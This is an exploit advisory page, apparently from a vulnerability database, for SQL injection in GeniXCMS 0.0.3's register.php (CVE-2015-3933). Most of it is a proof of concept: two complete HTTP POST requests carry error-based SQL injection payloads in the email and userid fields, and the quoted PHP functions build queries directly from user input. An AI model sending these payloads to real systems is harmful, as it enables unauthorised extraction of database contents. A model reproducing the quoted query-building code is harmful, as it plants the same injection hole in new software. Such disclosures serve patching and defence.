Lucene search
CfreerPACKETSTORM:132451HistoryJun 25, 2015 - 12:00 a.m.
GeniXCMS 0.0.3 SQL Injection
2015-06-2500:00:00
cfreer
packetstormsecurity.com
21
0.002 Low
EPSS
Percentile
60.1%
`# Exploit Title: Genixcms register.php multiple SQL vuln
# Date: 2015-06-23
# Exploit Author: cfreer (poc-lab)
# Vendor Homepage: http://www.genixcms.org
# Software Link:
https://codeload.github.com/semplon/GeniXCMS/zip/master/GeniXCMS-master.zip
# Version: 0.0.3
# Tested on: Apache/2.4.7 (Win32)
# CVE : CVE-2015-3933
=====================
SOFTWARE DESCRIPTION
=====================
Free and Opensource Content Management System, a new approach of simple and
lightweight CMS. Get a new experience of a fast and easy to modify CMS.
=============================
VULNERABILITY: SQL Injection
=============================
PocοΌ
1γGenixcms register.php email SQL vuln
HTTP Data Stream
POST /genixcms/register.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101
Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: ECS[visit_times]=4; iAv6_2132_saltkey=JLrHe7OQ;
PHPSESSID=r7o8e5rghc0n0j09i6drb4m9v6; GeniXCMS=8fq1peiv9lahvq3d1qlfab7g47
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 199
email='and(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)and'&pass1=cfreer&pass2=cfreer®ister=1&token=&userid=poc-lab
\inc\lib\User.class.php
public static function is_email($vars){
if(isset($_GET['act']) && $_GET['act'] == 'edit'){
$where = "AND `id` != '{$_GET['id']}' ";
}else{
$where = '';
}
$e = Db::result("SELECT * FROM `user` WHERE `email` = '{$vars}'
{$where}");
if(Db::$num_rows > 0){
return false;
}else{
return true;
}
}
==============================================================================================================================================
2γGenixcms register.php userid SQL vuln
HTTP Data Stream
POST /genixcms/register.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101
Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: ECS[visit_times]=4; iAv6_2132_saltkey=JLrHe7OQ;
PHPSESSID=r7o8e5rghc0n0j09i6drb4m9v6; GeniXCMS=8fq1peiv9lahvq3d1qlfab7g47
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 224
[email protected]&pass1=poc-lab.org&pass2=poc-lab.org
®ister=1&token=&userid='and(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)and'
\inc\lib\User.class.php
public static function is_exist($user) {
if(isset($_GET['act']) && $_GET['act'] == 'edit'){
$where = "AND `id` != '{$_GET['id']}' ";
}else{
$where = '';
}
$usr = Db::result("SELECT `userid` FROM `user` WHERE `userid` =
'{$user}' {$where} ");
$n = Db::$num_rows;
if($n > 0 ){
return false;
}else{
return true;
}
}
referer: https://www.exploit-db.com/exploits/37363/
`
Related
prion
prion
Sql injection
2017-11-08 16:29:00
nvd
nvd
CVE-2015-3933
2017-11-08 16:29:00
zdt
zdt
GeniXCMS 0.0.3 - register.php SQL Injection Vulnerabilities
2015-06-25 00:00:00
exploitpack
exploitpack
GeniXCMS 0.0.3 - register.php SQL Injection
2015-06-24 00:00:00
cve
cve
CVE-2015-3933
2017-11-08 16:29:00
cvelist
cvelist
CVE-2015-3933
2017-11-08 16:00:00
exploitdb
exploitdb
GeniXCMS 0.0.3 - 'register.php' SQL Injection
2015-06-24 00:00:00
openvas
openvas
Genixcms Multiple SQL Injection Vulnerabilities (Jun 2015)
2015-06-25 00:00:00